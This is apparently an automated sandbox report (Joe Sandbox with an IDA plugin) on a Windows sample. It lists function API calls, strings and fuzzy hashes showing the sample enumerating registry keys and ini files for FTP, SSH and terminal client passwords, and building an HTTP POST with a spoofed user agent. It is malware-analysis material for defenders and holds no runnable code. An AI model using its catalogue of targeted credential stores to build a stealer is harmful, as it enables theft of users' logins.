Opcode Fuzzy Hash: d7cd4a0a4bc6714c2a85d86dd2bf7c06aba812de7b2a8469bb75f735029e579c
Instruction Fuzzy Hash: A6414B71900228AADB30ABA18C46FEEB7B9AF05305F1045F7B548B15E1D6BC8EC49F59

Function 00402A46 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

S-1-5-18, xrefs: 00402AFB

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: S-1-5-18
API String ID: 0-4289277601
Opcode ID: 37bc9dbcb38b01fa5aecd9c86e21be2900b90d044a773d9fa0b61d3e1d082508
Instruction ID: 8372d51fa9723f903650ede8cb06a39b1e2f15f0f1e7b236b3afffd489f3b0a9
Opcode Fuzzy Hash: 37bc9dbcb38b01fa5aecd9c86e21be2900b90d044a773d9fa0b61d3e1d082508
Instruction Fuzzy Hash: 8F214F35A00109AFDF21AFA0DD8ABEE7B75FB40304F504577A010F11E5DBB99A80CB18

Function 004064D0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 004064E6
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040651A
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040674D

Strings

Host, xrefs: 0040656F
Password, xrefs: 00406551
Login, xrefs: 0040658D
InitialPath, xrefs: 004065AB
PasswordType, xrefs: 00406612
Port, xrefs: 004065CE

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$InitialPath$Login$Password$PasswordType$Port
API String ID: 1332880857-4069465341
Opcode ID: c6b7513951c47f9f5a01cf0da4954a9267f7612b84efb48c3a5f0a91923dc72f
Instruction ID: 0fc096d3d37037cc16ed1ec1010328a36586c2584db581cee8302a5e1ef279a3
Opcode Fuzzy Hash: c6b7513951c47f9f5a01cf0da4954a9267f7612b84efb48c3a5f0a91923dc72f
Instruction Fuzzy Hash: 3251E47181011CEADF216B61CD41BED7AB9BF44308F10C0BAB589741B1CB7A5BA1DF98

Function 0040CE9D Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040CEB0
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040CEE4
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D0ED

Strings

UserID, xrefs: 0040CF54
ServerName, xrefs: 0040CF39
InitialDirectory, xrefs: 0040CFBA
Password, xrefs: 0040CF1E
ServerType, xrefs: 0040CFD5
PortNumber, xrefs: 0040CF74

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
API String ID: 1332880857-2649023343
Opcode ID: 7728b8fa2dad9df23dcf8aacb147bd42159a0573e5b603dfd2a373a2b42fffd3
Instruction ID: ad14e17c657b7347be5ca3fad85bf2b98e7f27bb44b17b38ae0359069b7c340a
Opcode Fuzzy Hash: 7728b8fa2dad9df23dcf8aacb147bd42159a0573e5b603dfd2a373a2b42fffd3
Instruction Fuzzy Hash: D351D63190011CFADF216B61CC42BDDBABABF04304F54C1BAB548740B1DB7A9B91AF99

Function 004079F4 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407A07
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A3B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407C51

Strings

FSProtocol, xrefs: 00407B32
RemoteDirectory, xrefs: 00407AC4
PortNumber, xrefs: 00407AE4
Password, xrefs: 00407A73
HostName, xrefs: 00407A8E
UserName, xrefs: 00407AA9

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
API String ID: 1332880857-3874328862
Opcode ID: 8266ec6394c74800c545c16a1eb243b31db84d6e9d57949c5817b2753a8ca0d6
Instruction ID: a2f01c333091a56cc32e69063268797347cd9da882b10acedfa14ebce3a0f252
Opcode Fuzzy Hash: 8266ec6394c74800c545c16a1eb243b31db84d6e9d57949c5817b2753a8ca0d6
Instruction Fuzzy Hash: 5F51D33190011CBADF216F51CC42BDD7AB9BF44308F50C1BAB548751B1DB7AAB91AF89

Function 0040DA8D Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DAA0
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DAD4
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DCBD

Strings

FTP destination port, xrefs: 0040DB62
FTP destination user, xrefs: 0040DB27
FTP destination password, xrefs: 0040DB42
FTP destination catalog, xrefs: 0040DB7D
FTP profiles, xrefs: 0040DB9D
FTP destination server, xrefs: 0040DB0C

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
API String ID: 1332880857-3620412361
Opcode ID: 3c78c24fb642e282fd578471d96bd84f9d03d9c7dc1ebaff2a0e33f91934ec65
Instruction ID: bf8ea6aea8852beb4c2163d16f4011c6439d7f5d6a7be0a0bc644d5b63a99ee0
Opcode Fuzzy Hash: 3c78c24fb642e282fd578471d96bd84f9d03d9c7dc1ebaff2a0e33f91934ec65
Instruction Fuzzy Hash: 9151A631900118FADF226F51CC42BDD7AB6BF04344F50C5BAB548741B1DBBA9BA59F88

Function 00407D46 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407D59
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407D8D
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407F55

Strings

PassWord, xrefs: 00407DCA
RootDirectory, xrefs: 00407E1B
Port, xrefs: 00407E36
UserName, xrefs: 00407E00
Url, xrefs: 00407DE5
ServerType, xrefs: 00407E51

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: PassWord$Port$RootDirectory$ServerType$Url$UserName
API String ID: 1332880857-2128033141
Opcode ID: 986fd394e2a718d93715dc03a1c8b3f2a4ede69ef196c9cdd04049391403d32d
Instruction ID: a6929998d7c28aeb33d9c4f10452cd18dbdaa3222607fbefcc00903e29e47e26
Opcode Fuzzy Hash: 986fd394e2a718d93715dc03a1c8b3f2a4ede69ef196c9cdd04049391403d32d
Instruction Fuzzy Hash: 7151A33184011CBADF216F51CC42BED7ABABF04304F50C5BAB558741B1DB7A5BA1AF88

Function 00402524 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 84
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32(Software\WinRAR,?), ref: 0040253F
RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00402558
RegCloseKey.ADVAPI32(?,?,?,00000000,00000003,?,?), ref: 00402565
GetTempPathA.KERNEL32(00000104,?), ref: 0040257E
CreateDirectoryA.KERNEL32(?,00000000,00000104,?), ref: 0040259F
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 004025FA
CloseHandle.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402618
DeleteFileA.KERNEL32(?,?,C0000000,00000003,00000000,00000002,00000000,00000000,?,00000000,00000104,?), ref: 00402627

Strings

Software\WinRAR, xrefs: 00402534

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Create$CloseFile$DeleteDirectoryHandlePathTempValue
String ID: Software\WinRAR
API String ID: 3443402316-224198155
Opcode ID: 13873cc295b6137b813846326813ebbb91304b46cf2c86a41a1078ee5c261f3e
Instruction ID: 32f6b297682f596fcc5cacc293333f1b3d1948feb52381050e5e2f934166a6a3
Opcode Fuzzy Hash: 13873cc295b6137b813846326813ebbb91304b46cf2c86a41a1078ee5c261f3e
Instruction Fuzzy Hash: 0121817190020DBBDF21AFA1CD46FDE7A29AB14748F10047BB604B50E1D6FA9BD09B1C

Function 0040E824 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E847
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E87B
GetPrivateProfileStringA.KERNEL32(Program,DataPath,00414918,?,00000104,00000000), ref: 0040E901
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000105), ref: 0040E95A

Strings

\PocoSystem.ini, xrefs: 0040E8D5
Program, xrefs: 0040E8FC
accounts.ini, xrefs: 0040E910
DataPath, xrefs: 0040E8F7
Path, xrefs: 0040E8B3

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: AllocCloseEnumLocalOpenPrivateProfileString
String ID: DataPath$Path$Program$\PocoSystem.ini$accounts.ini
API String ID: 1343824468-2495907966
Opcode ID: f73ede30d54b750529b7b749db5b68bc80742756f9d8386b5fdb1dfc49aca1d6
Instruction ID: 6bcbfef0ff057cc4776b97580779cf95339c6a899dc07cd5d816c2af142598af
Opcode Fuzzy Hash: f73ede30d54b750529b7b749db5b68bc80742756f9d8386b5fdb1dfc49aca1d6
Instruction Fuzzy Hash: F031F87194020CBADF617B51CC42FDD7ABABF10704F10C4BBB548B50E1CAB95BA19B99

Function 00404E8C Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00404EB0

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

GetPrivateProfileStringA.KERNEL32(WS_FTP,DIR,00414918,?,00000104,?), ref: 00404F00
GetPrivateProfileStringA.KERNEL32(WS_FTP,DEFDIR,00414918,?,00000104,?), ref: 00404F3B

Strings

WS_FTP, xrefs: 00404EFB, 00404F36
\Ipswitch\WS_FTP, xrefs: 00404F6B
DEFDIR, xrefs: 00404F31
\Ipswitch, xrefs: 00404F87, 00404F96, 00404FA5
DIR, xrefs: 00404EF6
\win.ini, xrefs: 00404EC8

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: PrivateProfileStringlstrlen$DirectoryWindowslstrcatlstrcpy
String ID: DEFDIR$DIR$WS_FTP$\Ipswitch$\Ipswitch\WS_FTP$\win.ini
API String ID: 2508676433-45949541
Opcode ID: 084568d19fe147f413b8ba655580a624bf3ad8219734f6705ee3260ffc2a1841
Instruction ID: e5b95db0642764f108e7ba041b0e550ef6841d1e24d09a2ff7db66db6e884bb2
Opcode Fuzzy Hash: 084568d19fe147f413b8ba655580a624bf3ad8219734f6705ee3260ffc2a1841
Instruction Fuzzy Hash: 7D2146B1A84208BAEF11BB61CC43FDD3669AB94744F1000B77708F51E2DAF99AC09A5D

Function 0040623E Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406254
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406288
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406496

Strings

Host, xrefs: 004062D8
Port, xrefs: 00406337
User, xrefs: 004062F6
SSH, xrefs: 00406385
PthR, xrefs: 00406314

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Port$PthR$SSH$User
API String ID: 1332880857-1643752846
Opcode ID: 8037f23a873e77a0f6edddb421db5ffbe9abf7f49fb2db230b895b2aee70f783
Instruction ID: 0e0d0a83c40d9c080529aadc08bc8f4cf689f85e177fa5954b2f3198303268ea
Opcode Fuzzy Hash: 8037f23a873e77a0f6edddb421db5ffbe9abf7f49fb2db230b895b2aee70f783
Instruction Fuzzy Hash: C251C431800118FADF216F61CC42BDD7AB9BF44308F50C1BAB549741B1DBBA5BA1AF99

Function 00403C26 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C99
InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403CC4
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403D0A
wsprintfA.USER32 ref: 00403D2F

Part of subcall function 00403BF8: setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403C1D

lstrlenA.KERNEL32(?,00001000,00001000,00001000), ref: 00403D5A
closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403DA5

Strings

<, xrefs: 00403CE4
POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403D27

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlensetsockoptwsprintf
String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
API String ID: 2761384797-2005047030
Opcode ID: b053dbc70a52213ddd447e7c13b0c42c6f570c480b6c7b3ac6f92ea3c1945e54
Instruction ID: fe07db4af8dd94df17ee6c720c547efa6b0131b555141efaa36af9fbc2ff82a2
Opcode Fuzzy Hash: b053dbc70a52213ddd447e7c13b0c42c6f570c480b6c7b3ac6f92ea3c1945e54
Instruction Fuzzy Hash: 93410731D00209EBEF11AFD1CC41BEEBE79AF44349F10843AF510B52A1D7B95A55DB19

Function 00405D8D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00405DA3
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405DD7
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F83

Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Strings

RemoteDir, xrefs: 00405E69
HostAdrs, xrefs: 00405E2D
UserName, xrefs: 00405E4B
Password, xrefs: 00405E0F
Port, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: HostAdrs$Password$Port$RemoteDir$UserName
API String ID: 3369285772-3748300950
Opcode ID: 14361c1874bff10c4c9838cde4c76cab8e6f021362150fd43372c907ae6ab6a3
Instruction ID: 2eea4d456f73d42d52b348fa92dc40ddc9746dda4a12fc41e63022af70a36ae2
Opcode Fuzzy Hash: 14361c1874bff10c4c9838cde4c76cab8e6f021362150fd43372c907ae6ab6a3
Instruction Fuzzy Hash: 5A41E67190011CFADF216B61CC42BDE7AB9BF44304F50C0BAB588741B1DB7A5B91AF98

Function 0040D825 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D838
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D86C
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA00

Strings

PortNumber, xrefs: 0040D8FA
TerminalType, xrefs: 0040D915
HostName, xrefs: 0040D8A4
UserName, xrefs: 0040D8BF
Password, xrefs: 0040D8DA

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$PortNumber$TerminalType$UserName
API String ID: 1332880857-1017491782
Opcode ID: 633d87b1d0210967937b8ea46313bb2e639d936a2d24a0312f2885e8257566cc
Instruction ID: 971e5b3844e2a4190a23d4486ec320f40f1845a70572575ff90aef2106704998
Opcode Fuzzy Hash: 633d87b1d0210967937b8ea46313bb2e639d936a2d24a0312f2885e8257566cc
Instruction Fuzzy Hash: 64419471800118FADF616F51CC42BDD7AB6BF04304F5081BAB548741B1DB7A9BA5AFC8

Function 004071E1 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071F4
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407228
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073BA

Strings

FtpUserName, xrefs: 004072B1
FtpServer, xrefs: 00407296
FtpDirectory, xrefs: 004072CC
FtpPassword, xrefs: 00407260
_FtpPassword, xrefs: 0040727B

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
API String ID: 1332880857-980612798
Opcode ID: 80c70e74b41c669a5f6cff5d7adfe5ed64f5d960890017647973077786b2b2b9
Instruction ID: 6a640fb53117900caefd170e7f704ebfcd01eb9f748b4f932ba6877f7caabf76
Opcode Fuzzy Hash: 80c70e74b41c669a5f6cff5d7adfe5ed64f5d960890017647973077786b2b2b9
Instruction Fuzzy Hash: 1A41A23184011CBADF216B51CC42FDD7ABABF04304F54C1BAB948741B1DBBA6B91AF99

Function 00406FB6 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406FC9
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406FFD
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040718F

Strings

Server, xrefs: 0040706B
_Password, xrefs: 00407050
Directory, xrefs: 004070A1
UserName, xrefs: 00407086
Password, xrefs: 00407035

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Directory$Password$Server$UserName$_Password
API String ID: 1332880857-3317168126
Opcode ID: da109ab49e87ccf9e7003299793fa87cfc5bd20cd33f3d4bf7c3dad87cb79719
Instruction ID: a357f4283968390ce9a36961c27009d3f56b5993c4b20a818c8f4fb79495d9c5
Opcode Fuzzy Hash: da109ab49e87ccf9e7003299793fa87cfc5bd20cd33f3d4bf7c3dad87cb79719
Instruction Fuzzy Hash: 9F41B63194011CBADF216F51CC42BDD7ABABF04344F50C1BAB548781B1DBBA5B91AF89

Function 00406025 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 112registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040603B
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040606F
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406204

Strings

Port, xrefs: 004060E3
Password, xrefs: 004060A7
HostName, xrefs: 004060C5
HostDirName, xrefs: 0040611F
Username, xrefs: 00406101

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostDirName$HostName$Password$Port$Username
API String ID: 1332880857-791697221
Opcode ID: 2fd3a250acc75e91b7d50f7b2ecb30895178a3a2d7c6fc6c9eca39d1d43210bf
Instruction ID: 92c87779d6e83c18bad15a4107186905ebe0c89097d428790371e3a1127e341d
Opcode Fuzzy Hash: 2fd3a250acc75e91b7d50f7b2ecb30895178a3a2d7c6fc6c9eca39d1d43210bf
